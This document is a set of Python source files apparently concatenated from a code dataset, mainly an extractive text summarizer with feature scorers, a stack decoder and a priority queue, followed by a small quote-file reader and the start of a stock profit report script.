        noSpace = False
        text = f.readline()
        while(text is not None and text.strip().startswith(SentenceProcessor.SENTENCE_MARKER)):
            #Sentence starts
            senLength=0
            sb = ""
            list_of_words= []
            lineNum = lineNum+1
            while (text is not None):
                text = f.readline()
                if(text is not None and not (text =="") and not (text.strip().startswith(SentenceProcessor.SENTENCE_MARKER))):
                    if(not text.startswith(SentenceProcessor.WORD_MARKER)):
                        continue
                    word = text.split("S: ")[1]
                    word = word.replace('\n','')
                    #filter spurious chars
                    if word in SentenceProcessor.PUNCTUATION:
                        continue
                    else:
                        if(word == ",") or (word == "."):
                            noSpace=True
                        cWord = ""
                        if '-' in word:
                            splitted = word.split("-")
                            senLength = senLength+1
                            for cword in splitted:
                                # BUGFIX: replace on the piece, not the whole
                                # token (same fix as getDocuments above).
                                cWord = cword.replace("\\W", "")
                                if len(cWord)>0:
                                    list_of_words.append(cWord)
                        else:
                            cWord = word.replace("\\W", "")
                            if len(cWord)>0:
                                senLength = senLength+1
                                list_of_words.append(cWord)
                        if len(sb)== 0:
                            sb += word
                        else:
                            if noSpace:
                                noSpace = False
                                sb += word
                            else:
                                sb+=' '
                                sb += word
                else:
                    break
            if(len(list_of_words)>0 and len(sb)>0):
                id_no = PROVIDE_ID.getNextsen_id_no()
                s = Sentence(id_no, senLength, list_of_words, sb, lineNum, doc_id_no)
                s.setPositiveSample(True)
                s.setPartOfHumanSummary(True)
                sentences.append(s)
        return sentences
###############################################################################################################################################
#Importance Scorers
class ImportanceScorer:
    """Abstract base for per-sentence feature scorers used by ImportanceModule."""
    def __init__(self):
        pass
    def initialize(self, docs):
        """Precompute any per-document statistics needed for scoring."""
        raise NotImplementedError("Subclass must implement abstract method")
    def getImportanceScore(self, doc, sentence):
        """Return this feature's score for `sentence` within `doc`."""
        raise NotImplementedError("Subclass must implement abstract method")
    def setWeightage(self, weight):
        raise NotImplementedError("Subclass must implement abstract method")
    def getWeightage(self):
        raise NotImplementedError("Subclass must implement abstract method")
    def getName(self):
        raise NotImplementedError("Subclass must implement abstract method")
class UpperCaseCalculator(ImportanceScorer):
    """Scores a sentence by the fraction of words starting with an ASCII capital."""
    def __init__(self):
        self.docMap = None
        self.weightage = 1.0
    def initialize(self, docs):
        # Cache per-document mean/std of the raw sums. Kept for parity with
        # the sibling scorers even though the final score does not use them.
        stats = {}
        for document in docs:
            stats[document.getdoc_id_no()] = self.getDocStats(document)
        self.docMap = stats
    def getDocStats(self, doc):
        stats = Pair()
        doc_id = doc.getdoc_id_no()
        count = doc.getNumberOfSentences()
        for sent in doc.getSentences():
            stats.avg += self.getSentenceSum(doc_id, sent)
        stats.avg /= count
        for sent in doc.getSentences():
            stats.stdDev += (self.getSentenceSum(doc_id, sent) - stats.avg) ** 2
        stats.stdDev /= count
        stats.stdDev = math.sqrt(stats.stdDev)
        return stats
    def getSentenceSum(self, docId, s):
        # Note: forwards the sentence's own doc id, mirroring the original.
        return float(sum(self.getWordScore(s.getdoc_id_no(), token)
                         for token in s.getList_of_words()))
    def getWordScore(self, docId, word):
        stripped = word.strip()
        # ASCII range check: 'A' (65) .. 'Z' (90).
        if stripped and 65 <= ord(stripped[0]) <= 90:
            return 1
        return 0
    def getImportanceScore(self, doc, sentence):
        key = doc.getdoc_id_no()
        if key in self.docMap:
            stats = self.docMap[key]
        else:
            stats = self.getDocStats(doc)
            self.docMap[key] = stats
        raw = self.getSentenceSum(key, sentence)
        return float(raw) / sentence.getSentenceLength()
    def getName(self):
        return "UpperCaseCalculator"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class Pair:
    """Mean / standard-deviation pair used for per-document score statistics."""
    def __init__(self):
        self.avg, self.stdDev = 0, 0
class NounsCalculator(ImportanceScorer):
    """Scores a sentence by its fraction of noun-tagged words (NN/NNP/NNS via nltk.pos_tag)."""
    def __init__(self):
        self.docMap = None
        self.weightage = 1.0
    def initialize(self, docs):
        # Cache per-document mean/std of the raw sums (fetched but not used
        # by getImportanceScore; kept for parity with sibling scorers).
        docMap = {}
        for doc in docs:
            docMap[doc.getdoc_id_no()] = self.getDocStats(doc)
        self.docMap = docMap
    def getDocStats(self, doc):
        p = Pair()
        for sent in doc.getSentences():
            p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
        p.avg /= doc.getNumberOfSentences()
        for sent in doc.getSentences():
            p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
        p.stdDev /= doc.getNumberOfSentences()
        p.stdDev = math.sqrt(p.stdDev)
        return p
    def getSentenceSum(self, docId, s):
        # Count words POS-tagged as nouns.
        score = 0.0
        tags = nltk.pos_tag(s.getList_of_words())
        for tag in tags:
            if tag[1] == 'NN' or tag[1] == 'NNP' or tag[1] == 'NNS':
                score = score + 1
        return score
    def getImportanceScore(self, doc, sentence):
        if doc.getdoc_id_no() in self.docMap:
            p = self.docMap[doc.getdoc_id_no()]
        else:
            p = self.getDocStats(doc)
            self.docMap[doc.getdoc_id_no()] = p
        score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
        return float(score) / sentence.getSentenceLength()
    def getName(self):
        # BUGFIX: previously returned "UpperCaseCalculator" (copy-paste).
        return "NounsCalculator"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class VerbsCalculator(ImportanceScorer):
    """Scores a sentence by its fraction of verb-tagged words (VB* via nltk.pos_tag)."""
    def __init__(self):
        self.docMap = None
        self.weightage = 1.0
    def initialize(self, docs):
        # Cache per-document mean/std of the raw sums (fetched but not used
        # by getImportanceScore; kept for parity with sibling scorers).
        docMap = {}
        for doc in docs:
            docMap[doc.getdoc_id_no()] = self.getDocStats(doc)
        self.docMap = docMap
    def getDocStats(self, doc):
        p = Pair()
        for sent in doc.getSentences():
            p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
        p.avg /= doc.getNumberOfSentences()
        for sent in doc.getSentences():
            p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
        p.stdDev /= doc.getNumberOfSentences()
        p.stdDev = math.sqrt(p.stdDev)
        return p
    def getSentenceSum(self, docId, s):
        # Count words POS-tagged as any verb form.
        score = 0.0
        tags = nltk.pos_tag(s.getList_of_words())
        for tag in tags:
            if tag[1] in ('VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ'):
                score = score + 1
        return score
    def getImportanceScore(self, doc, sentence):
        if doc.getdoc_id_no() in self.docMap:
            p = self.docMap[doc.getdoc_id_no()]
        else:
            p = self.getDocStats(doc)
            self.docMap[doc.getdoc_id_no()] = p
        score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
        return float(score) / sentence.getSentenceLength()
    def getName(self):
        # BUGFIX: previously returned "UpperCaseCalculator" (copy-paste).
        return "VerbsCalculator"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class AdjectivesCalculator(ImportanceScorer):
    """Scores a sentence by its fraction of adjective-tagged words (JJ/JJR/JJS)."""
    def __init__(self):
        self.docMap = None
        self.weightage = 1.0
    def initialize(self, docs):
        # Cache per-document mean/std of the raw sums (fetched but not used
        # by getImportanceScore; kept for parity with sibling scorers).
        docMap = {}
        for doc in docs:
            docMap[doc.getdoc_id_no()] = self.getDocStats(doc)
        self.docMap = docMap
    def getDocStats(self, doc):
        p = Pair()
        for sent in doc.getSentences():
            p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
        p.avg /= doc.getNumberOfSentences()
        for sent in doc.getSentences():
            p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
        p.stdDev /= doc.getNumberOfSentences()
        p.stdDev = math.sqrt(p.stdDev)
        return p
    def getSentenceSum(self, docId, s):
        # Count words POS-tagged as adjectives.
        score = 0.0
        tags = nltk.pos_tag(s.getList_of_words())
        for tag in tags:
            if tag[1] in ('JJ', 'JJR', 'JJS'):
                score = score + 1
        return score
    def getImportanceScore(self, doc, sentence):
        if doc.getdoc_id_no() in self.docMap:
            p = self.docMap[doc.getdoc_id_no()]
        else:
            p = self.getDocStats(doc)
            self.docMap[doc.getdoc_id_no()] = p
        score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
        return float(score) / sentence.getSentenceLength()
    def getName(self):
        # BUGFIX: previously returned "UpperCaseCalculator" (copy-paste).
        return "AdjectivesCalculator"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class SentenceLengthCalculator(ImportanceScorer):
    """Feature scorer returning the raw token length of a sentence."""
    def __init__(self):
        self.docMap = None
        self.weightage = 1.0
    def initialize(self, docs):
        self.docMap = {document.getdoc_id_no(): self.getDocStats(document)
                       for document in docs}
    def getDocStats(self, doc):
        stats = Pair()
        count = doc.getNumberOfSentences()
        for sent in doc.getSentences():
            stats.avg += sent.getSentenceLength()
        stats.avg /= count
        for sent in doc.getSentences():
            stats.stdDev += (sent.getSentenceLength() - stats.avg) ** 2
        stats.stdDev /= count
        stats.stdDev = math.sqrt(stats.stdDev)
        return stats
    def getImportanceScore(self, doc, sentence):
        # Stats are cached for parity with sibling scorers, but the returned
        # score is simply the unnormalized sentence length.
        key = doc.getdoc_id_no()
        if key not in self.docMap:
            self.docMap[key] = self.getDocStats(doc)
        return sentence.getSentenceLength()
    def getName(self):
        return "SentLength"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class NumLiteralsCalculator(ImportanceScorer):
    """Scores a sentence by its fraction of numeric-literal words."""
    def __init__(self):
        self.docMap = None
        self.weightage = 1.0
    def initialize(self, docs):
        # Cache per-document mean/std of the raw sums (fetched but not used
        # by getImportanceScore; kept for parity with sibling scorers).
        docMap = {}
        for doc in docs:
            docMap[doc.getdoc_id_no()] = self.getDocStats(doc)
        self.docMap = docMap
    def getDocStats(self, doc):
        p = Pair()
        for sent in doc.getSentences():
            p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
        p.avg /= doc.getNumberOfSentences()
        for sent in doc.getSentences():
            p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
        p.stdDev /= doc.getNumberOfSentences()
        p.stdDev = math.sqrt(p.stdDev)
        return p
    def getSentenceSum(self, docId, s):
        score = 0.0
        for word in s.getList_of_words():
            score += self.getWordScore(s.getdoc_id_no(), word)
        return score
    def getWordScore(self, docId, word):
        """Return 1 if `word` parses as a float, else 0."""
        word = word.strip()
        if len(word) > 0:
            try:
                float(word)
                return 1
            # Narrowed from a bare `except:` — float(str) only raises ValueError.
            except ValueError:
                return 0
        return 0
    def getImportanceScore(self, doc, sentence):
        if doc.getdoc_id_no() in self.docMap:
            p = self.docMap[doc.getdoc_id_no()]
        else:
            p = self.getDocStats(doc)
            self.docMap[doc.getdoc_id_no()] = p
        score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
        # The original also computed a z-score `alpha` here and discarded it;
        # that dead code has been removed.
        return score / sentence.getSentenceLength()
    def getName(self):
        return "NumLiteralsCalculator"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class SentencePosCalculator(ImportanceScorer):
    """Relative position of the sentence within its document, in [0, 1]."""
    def __init__(self):
        self.weightage = 1.0
    def initialize(self, docs):
        # Stateless scorer — nothing to precompute.
        pass
    def getImportanceScore(self, doc, sentence):
        total = float(doc.getNumberOfSentences())
        return float(sentence.getLocation_in_sentence()) / total
    def getName(self):
        return "SentPost"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class TfIdfCalculator(ImportanceScorer):
    """Scores a sentence by the average tf-idf weight of its words.

    initialize() builds an inverted index (word -> {doc id -> count}) over all
    documents, then converts the counts to (1 + log tf) * idf weights in place.
    """
    def __init__(self):
        # word -> {doc id -> tf-idf weight} after initialize()/normalize().
        self.stats = None
        self.totalDocs = 0
        self.docMap = None
        self.weightage = 1.0
    def initialize(self,docs):
        self.stats = {}
        self.totalDocs = len(docs)
        # process() mutates self.stats and returns None; this list only
        # collects Nones and is never read.
        processes_docs = []
        for doc in docs:
            processes_docs.append(self.process(doc))
        self.normalize()
        self.initDocStats(docs)
    def initDocStats(self,docs):
        # Cache per-document mean/std of the sentence tf-idf sums.
        docMap = {}
        for doc in docs:
            pair = self.getDocStats(doc)
            docMap[doc.getdoc_id_no()] = pair
        self.docMap = docMap
    def getDocStats(self,doc):
        p = Pair()
        for sent in doc.getSentences():
            p.avg += self.getSentenceSum(doc.getdoc_id_no(), sent)
        p.avg /= doc.getNumberOfSentences()
        for sent in doc.getSentences():
            p.stdDev += (self.getSentenceSum(doc.getdoc_id_no(), sent) - p.avg)**2
        p.stdDev /= doc.getNumberOfSentences()
        p.stdDev = math.sqrt(p.stdDev)
        return p
    def getSentenceSum(self,docId,s):
        # Sum of the tf-idf weights of the sentence's words.
        score = 0.0
        for word in s.getList_of_words():
            score += self.getImportanceScore2(s.getdoc_id_no(), word)
        return score
    def getImportanceScore2(self, docId, word):
        # Raises KeyError for words/docs absent from the index built in initialize().
        return self.stats[word][docId]
    def getImportanceScore(self, doc, sentence):
        # Stats pair is fetched/cached for parity with sibling scorers but the
        # score is simply the length-normalized tf-idf sum.
        p = None
        if doc.getdoc_id_no() in self.docMap:
            p = self.docMap[doc.getdoc_id_no()]
        else:
            p = self.getDocStats(doc)
            self.docMap[doc.getdoc_id_no()] = p
        score = self.getSentenceSum(doc.getdoc_id_no(), sentence)
        return float(score)/sentence.getSentenceLength()
    def process(self,doc):
        # Accumulate raw term counts for `doc` into the inverted index.
        inverted_index = self.stats
        id_no = doc.getdoc_id_no()
        for sent in doc.getSentences():
            for word in sent.getList_of_words():
                ls = {}
                if word in inverted_index:
                    ls = inverted_index[word]
                    if id_no in ls:
                        count = ls[id_no]
                        ls[id_no] = count+1
                    else:
                        ls[id_no] = 1
                else:
                    ls[id_no]=1
                inverted_index[word] = ls
        self.stats = inverted_index
    def normalize(self):
        # Replace raw counts with (1 + log tf) * idf weights.
        inverted_index = self.stats
        for word in inverted_index.keys():
            posting = inverted_index[word]
            docfreq = len(posting.keys())
            # idf is 1 (not 0) when the word occurs in every document.
            idf = 1
            if self.totalDocs != docfreq:
                idf = math.log(self.totalDocs/docfreq)
            for docid in inverted_index[word].keys():
                tfidf = (1+math.log(inverted_index[word][docid]))*idf
                inverted_index[word][docid] = tfidf
        self.stats = inverted_index
    def getName(self):
        return "TFIDFSum"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
class TopKImpWordsCalculator(ImportanceScorer):
    """Counts the words whose tf-idf weight clears THRESHOLDS.TFIDFThreshold."""
    def __init__(self):
        # Externally wired TfIdfCalculator (via setTfIDFCalculator).
        self.tfIdfStats = None
        self.weightage = 1.0
    def initialize(self, docs):
        # No precomputation of its own.
        pass
    def setTfIDFCalculator(self, tfidfcalculator):
        self.tfIdfStats = tfidfcalculator
    def getImportanceScore(self, doc, sentence):
        words = sentence.getList_of_words()
        if self.tfIdfStats is None:
            # Fallback: every word counts when no tf-idf table is wired in.
            return len(words)
        doc_id = sentence.getdoc_id_no()
        count = 0
        for word in words:
            if self.tfIdfStats.getImportanceScore2(doc_id, word) >= THRESHOLDS.TFIDFThreshold:
                count += 1
        return count
    def getName(self):
        return "TopKImpWords"
    def getWeightage(self):
        return self.weightage
    def setWeightage(self, weight):
        self.weightage = weight
#################################################################################################################################################
#Overall Importance Module
class ImportanceModule:
    """Combines the individual feature scorers into one per-sentence score."""
    def __init__(self, docs):
        self.scorers = []
        # Same scorer classes, same order and initial weight (1.0) as the
        # original hand-unrolled construction.
        scorer_classes = (
            TfIdfCalculator,
            SentenceLengthCalculator,
            SentencePosCalculator,
            NumLiteralsCalculator,
            UpperCaseCalculator,
            NounsCalculator,
            VerbsCalculator,
            AdjectivesCalculator,
        )
        for scorer_cls in scorer_classes:
            scorer = scorer_cls()
            scorer.setWeightage(1.0)
            scorer.initialize(docs)
            self.scorers.append(scorer)
    def setValues(self, docs):
        """Assign each sentence its combined importance score."""
        for doc in docs:
            for sentence in doc.getSentences():
                sentence.setScore(self.getSentenceScore(doc, sentence))
    def getSentenceScore(self, doc, sentence):
        # -0.839757 is a fixed bias/intercept — presumably fit offline;
        # confirm before changing.
        total = -0.839757
        for scorer in self.scorers:
            total += scorer.getImportanceScore(doc, sentence) * scorer.getWeightage()
        return total
    def setWeightsForImpScorers(self, weights):
        """Overwrite scorer weights positionally (same order as construction)."""
        for index, weight in enumerate(weights):
            self.scorers[index].setWeightage(weight)
###############################################################################################################################################
#Stack Decoder
class StackDecoder:
    """Beam ("stack") search over sentence subsets to assemble the best summary.

    Stack i holds candidate summaries of total word length i; candidates are
    extended one sentence at a time, skipping sentences too similar to ones
    already chosen. Relies on the global THRESHOLDS configuration.
    """
    def __init__(self,documents):
        # stacks[i]: candidates of length i; index MAX+1 is the overflow bucket.
        self.stacks = []
        # (candidate idx, chosen idx) -> cached similarity.
        self.simScoreCache = {}
        self.documents = documents
        self.sentences = self.buildSentenceList()
        self.setUpStacks()
        self.simScorer = TF_IDF_Similarity()
    def setUpStacks(self):
        for i in range(THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+2):
            self.stacks.append(Stack())
    def runStackDecoder(self):
        """Run the search: extend each stack's candidates into longer stacks."""
        self.initializeStack()
        for i in range(THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+1):
            print ("StackDecoder:runStackDecoder:: Running stack: " + str(i))
            if self.stacks[i].pq.size==0:
                continue
            # Clone so additions during extension don't disturb iteration.
            pqClone = self.stacks[i].pq.clone()
            while(pqClone.hasNext()):
                summary = pqClone.next()
                for j in range(len(self.sentences)):
                    if j in summary:
                        continue
                    s = self.sentences[j]
                    # Candidates that would exceed the cap go to the overflow bucket.
                    newIndex = THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+1
                    if i+s.getSentenceLength() <= THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED:
                        newIndex = i+s.getSentenceLength()
                    if self.isIncludeSentence(summary, s, j):
                        newSummary = list(summary)
                        newSummary.append(j)
                        priority = self.getObjectiveFunction(newSummary)
                        if priority > self.stacks[newIndex].pq.getPriority():
                            self.stacks[newIndex].add(newSummary, priority)
            self.stacks[i].printStackPQ()
    def initializeStack(self):
        # Seed each stack with every single-sentence candidate.
        for i in range(len(self.sentences)):
            s = self.sentences[i]
            l = []
            l.append(i)
            index = THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED+1
            if s.getSentenceLength()<=THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED:
                index = s.getSentenceLength()
            self.stacks[index].add(l, self.getObjectiveFunction(l))
    def printStack(self, num):
        self.stacks[num].printStackPQ()
    def getObjectiveFunction(self,senRefList):
        # Objective = sum of the precomputed importance scores of the chosen sentences.
        summaryObjectiveScore = 0
        for i in senRefList:
            summaryObjectiveScore += self.sentences[i].getScore()
        return summaryObjectiveScore
    def buildSentenceList(self):
        # Flatten all documents into one candidate list, dropping sentences
        # below the minimum-length threshold.
        sentences = []
        senNum=-1;
        for i in range(len(self.documents)):
            print("StackDecoder:buildSentenceList:: Doc: " + str(i+1))
            d = self.documents[i]
            for s in d.getSentences():
                if s.getSentenceLength()>=THRESHOLDS.MINIMUM_LENGTH_SENTENCE_ALLOWED:
                    sentences.append(s);
                    senNum = senNum+1
                    print("StackDecoder:buildSentenceList:: (" + str(senNum) + ")" + str(s.getActual_sentence()) + " - " + str(s.getScore()))
        return sentences
    def isIncludeSentence(self,summary, s, sIndex):
        #returns whether the sentence should be included in the summary or not
        # Rejects s if it is too similar to any sentence already chosen.
        for i in range(len(summary)):
            key = str(sIndex)+","+ str(summary[i])
            sim = 0;
            if key in self.simScoreCache.keys():
                sim = self.simScoreCache[key]
            else:
                sim = self.simScorer.get_score(s, self.sentences[summary[i]])
                self.simScoreCache[key] = sim
            if sim > THRESHOLDS.SIMILARITY_BOUND:
                return False
        return True
    def dumpBestSummary(self,fileName):
        """Write the highest-priority candidate from the fullest non-empty stack to `fileName`."""
        f = open(fileName, 'w')
        bestSummary = self.stacks[THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED].getBest()
        length = THRESHOLDS.MAXIMUM_LENGTH_SUMMARY_ALLOWED
        # Fall back to shorter stacks until one has a candidate.
        while(bestSummary is None):
            print(length)
            length = length-1
            bestSummary = self.stacks[length].getBest()
        print(bestSummary)
        # Emit sentences in document order, not selection order.
        bestSummary = sorted(bestSummary)
        for senIndex in bestSummary:
            s = self.sentences[senIndex]
            f.write(s.getActual_sentence())
            f.write('\n')
        f.close()
################################################################################################################################################
#Stack for StackDecoder
class Stack:
    """Decoder stack: a thin facade over a SpecialPQ priority queue."""

    def __init__(self):
        self.pq = SpecialPQ()

    def add(self, key, priority):
        """Insert a candidate ``key`` with the given ``priority``."""
        self.pq.add(key, priority)

    def getBest(self):
        """Return the highest-priority candidate without removing it."""
        return self.pq.peek()

    def printStackPQ(self):
        """Dump the queue contents to stdout for debugging."""
        print ("StackDecoder:Stack:printStackPQ:: Stack print..")
        print(self.pq.toString(self.pq.size))
###############################################################################################################################################
#Special Priority Queue
class SpecialPQ:
    """Bounded max-heap priority queue.

    Holds at most ``capacity`` elements, where capacity is forced to the form
    2**n - 1 (a complete binary tree). ``elements`` and ``priorities`` are
    parallel arrays: priorities form the heap, elements ride along. When the
    queue is full, a new item may replace a low-priority fringe (leaf) entry
    instead of growing the queue.
    """
    def __init__(self):
        self.size = 0
        # Round the requested capacity up to the next 2**n - 1.
        self.capacity = self.getLegalCapacity(128)
        self.elements = []
        self.priorities = []
        for i in range(self.capacity):
            self.priorities.append(0)
    def parent(self,loc):
        # Index of the parent node in the implicit binary heap.
        return int((loc -1)/2)
    def leftChild(self,loc):
        return 2*loc+1
    def rightChild(self,loc):
        return 2*loc+2
    def heapifyUp(self,loc):
        # Bubble the entry at ``loc`` up while it beats its parent (max-heap).
        if loc==0:
            return
        parent = self.parent(loc)
        if (self.priorities[loc] > self.priorities[parent]):
            self.swap(loc, parent)
            self.heapifyUp(parent)
    def heapifyDown(self,loc):
        # Sink the entry at ``loc`` down toward the leaves (max-heap).
        max_ = loc;
        leftChild = self.leftChild(loc)
        if (leftChild < self.size):
            priority = self.priorities[loc]
            leftChildPriority = self.priorities[leftChild]
            if (leftChildPriority > priority):
                max_ = leftChild
            rightChild = self.rightChild(loc)
            if (rightChild < self.size):
                rightChildPriority = self.priorities[self.rightChild(loc)]
                if (rightChildPriority > priority and rightChildPriority > leftChildPriority):
                    max_ = rightChild
        if (max_ == loc):
            return;
        self.swap(loc, max_)
        self.heapifyDown(max_)
    def swap(self,loc1,loc2):
        # Swap both parallel arrays to keep element/priority pairs aligned.
        tempPriority = self.priorities[loc1]
        tempElement = self.elements[loc1]
        self.priorities[loc1] = self.priorities[loc2]
        self.elements[loc1] = self.elements[loc2]
        self.priorities[loc2] = tempPriority
        self.elements[loc2] = tempElement
    def removeFirst(self):
        """Remove the maximum-priority entry (heap root)."""
        if (self.size < 1):
            return
        self.swap(0, self.size - 1)
        self.size = self.size-1
        self.elements.pop(self.size)
        self.heapifyDown(0)
    def hasNext(self):
        return not self.isEmpty()
    def next(self):
        """Pop and return the current maximum-priority element."""
        first = self.peek()
        self.removeFirst()
        return first
    def peek(self):
        """Return the maximum-priority element without removing it, or None."""
        if self.size > 0:
            return self.elements[0]
        else:
            return None
    def getPriority(self):
        # Priority of the current root; -1 sentinel when empty.
        if (self.size > 0):
            return self.priorities[0]
        else:
            return -1
    def isEmpty(self):
        return (self.size == 0)
    def add(self,key, priority):
        """Insert ``key``; when full, replace a weaker fringe entry instead.

        Always returns True (Java-style contract).
        """
        size = self.size
        if (self.size == self.capacity):
            index = self.getFringeIndex(self.capacity-1)
            if(self.priorities[index] < priority):
                # NOTE(review): pop(index) + append(key) shifts every element
                # after ``index`` left while priorities stay in place, so the
                # two parallel arrays can fall out of alignment here — verify.
                self.elements.pop(index)
                self.elements.append(key)
                self.priorities[index] = priority
                self.heapifyUp(index)
        else:
            self.elements.append(key)
            self.priorities[size] = priority
            self.heapifyUp(size)
            self.size = self.size+1
        return True
    def getFringeIndex(self, i):
        # Pick a low-priority leaf near index ``i`` as a replacement victim.
        minIndex=-1;
        parent = self.parent(i)
        if(self.priorities[self.leftChild(parent)] < self.priorities[self.rightChild(parent)]):
            minIndex = self.leftChild(parent)
        else:
            minIndex = self.rightChild(parent)
        # Move to the sibling parent and repeat the comparison there.
        if(parent%2 == 0):
            parent = parent+1
        else:
            parent = parent-1
        # NOTE(review): this second comparison unconditionally overwrites the
        # first minIndex, so only the sibling subtree is ever considered —
        # looks unintended; verify against the original algorithm.
        if(self.priorities[self.leftChild(parent)] < self.priorities[self.rightChild(parent)]):
            minIndex = self.leftChild(parent)
        else:
            minIndex = self.rightChild(parent);
        return minIndex
    def toString(self, maxKeysToPrint):
        """Render up to ``maxKeysToPrint`` entries in priority order.

        Operates on a clone so the queue itself is not drained.
        """
        pq = self.clone()
        sb = "["
        numKeysPrinted = 0
        while (numKeysPrinted < maxKeysToPrint and pq.hasNext()):
            priority = pq.getPriority()
            element = pq.next()
            sb+=str(element)
            sb+=" : "
            sb+=str(priority)
            if (numKeysPrinted < self.size - 1):
                sb+=", "
            numKeysPrinted = numKeysPrinted+1
        if (numKeysPrinted < self.size):
            sb+="..."
        sb+="]"
        return sb
    def clone(self):
        """Shallow copy: elements list is copied, priorities re-padded."""
        clonePQ = SpecialPQ()
        clonePQ.size = self.size
        clonePQ.capacity = self.capacity
        clonePQ.elements = list(self.elements)
        clonePQ.priorities = []
        for i in range(clonePQ.capacity):
            clonePQ.priorities.append(0)
        if (self.size > 0):
            for i in range(self.size):
                clonePQ.priorities[i] = self.priorities[i]
        return clonePQ
    def getLegalCapacity(self,capacity):
        # Smallest value of form 2**n - 1 that is >= capacity.
        legalCapacity = 0
        while (legalCapacity < capacity):
            legalCapacity = 2 * legalCapacity + 1
        return legalCapacity
    def isPowerOfTwo(self, num):
        # True if num is a power of two (used to validate trim sizes).
        while(num > 1):
            if(num % 2 != 0):
                return False
            num /= 2
        return True
    def trim(self, newsize):
        """Shrink the queue to its ``newsize`` best entries (drains a prefix).

        ``newsize + 1`` is expected to be a power of two; otherwise only a
        warning is printed and trimming proceeds anyway.
        """
        if(newsize >= self.size):
            return
        if(not self.isPowerOfTwo(newsize+1)):
            print("size must be of form (2^n)-1")
        self.capacity = newsize;
        newelems = []
        newpriorities = []
        for i in range(newsize):
            pri = self.getPriority()
            elem = self.next()
            newelems.append(elem)
            newpriorities.append(pri)
        self.elements = newelems
        self.priorities = newpriorities
        self.capacity = newsize
        self.size = newsize
###############################################################################################################################################
#Start Function
class Start:
    """Command-line driver: load a data set, run the stack decoder per topic,
    and dump one summary file per topic."""
    @staticmethod
    def main():
        # Expects exactly one argument: the path to the data directory.
        if len(sys.argv)!=2:
            Start.usage()
            sys.exit(-1)
        in_time = int(round(time.time() * 1000))
        print("In Time: "+str(in_time))
        testDataSet = DataSet(sys.argv[1])
        testDataSet.calculateImportanceScores(Start.getWeights())
        print("DataSet Initialized")
        print("Start:main:: Running stack decoder ..")
        for t in testDataSet.getTopics():
            sd = StackDecoder(t.getDocuments())
            sd.runStackDecoder()
            # NOTE(review): hard-coded, machine-specific output directory.
            path = "/home/shivankit/Desktop/IR_Stack_decoder/summaries/" + str(testDataSet.getTopicName(t.gettopic_id_no()).upper())+".sum"
            sd.dumpBestSummary(path)
        out_time = int(round(time.time() * 1000))
        print(out_time)
        print ("Start:main:: Time taken by Stack decoder (s): " + str((out_time-in_time)/1000))
    @staticmethod
    def usage():
        """Print invocation help."""
        print ("Usage: python <main> <path to data>")
        print ("Note: 'data' folder contains the sample input files.")
    @staticmethod
    #Note: Set theta_0 in importance module
    #TFIDFSum,SentLength,SentPost,NumLiteralsCalculator,UpperCaseCalculator
    def getWeights():
        # Fixed feature weights for the sentence-importance linear model.
        res = []
        res.append(0.197971)
        res.append(0.283136)
        res.append(-0.300287)
        res.append(0.1664)
        res.append(0.160681)
        #Semantic Features
        res.append(0.160681)
        res.append(-0.160681)
        res.append(-0.160681)
        return res
###############################################################################################################################################
#Main Function
# Script entry point: run the full summarization pipeline.
if __name__ == "__main__":
    Start.main()
|
10,555 | 891e93bdd3ffb0003344b45dce0ad920e79716ca | # -*- coding: utf-8 -*-
def getFrases():
    """Read 'quotes.txt' and return its lines (trailing newlines kept).

    Fix: the original opened the file and relied on an explicit close(),
    leaking the handle if reading raised; a ``with`` block guarantees the
    file is closed on every path. ``list(f)`` yields the same line list as
    the original accumulate-per-line loop.

    Returns:
        list[str]: one entry per line of the file.
    """
    with open('quotes.txt', 'r') as arquivo:
        return list(arquivo)
10,556 | fb5f04226bd50ccc0744680c5bc2595de894ea6b | import baostock as bs
import pandas as pd
import os
from datetime import datetime, timedelta
import time
import requests
from lxml import etree
import re
from downloader import bao_d, xueqiu_d, dongcai_d
from code_formmat import code_formatter
from basic_stock_data import basic
class StockProfit:
    """Builds an Excel report of valuation / profit / broker-forecast data
    for the HS300 + ZZ500 constituents, pulling from xueqiu and dongcai."""
    def generate_report(self):
        """Read both constituent CSVs, enrich them, and write one workbook."""
        print('start generate hs300 profit report')
        hs300_df = pd.read_csv(os.path.join(
            os.getcwd(), 'raw_data/hs300_stocks.csv'), index_col=1, encoding="gbk")
        hs300_df = hs300_df.set_index("code")
        profit_hs300_df = self.get_stock_profit_data(hs300_df)
        print('start generate zz500 profit report')
        zz500_df = pd.read_csv(os.path.join(
            os.getcwd(), 'raw_data/zz500_stocks.csv'), index_col=1, encoding="gbk")
        zz500_df = zz500_df.set_index("code")
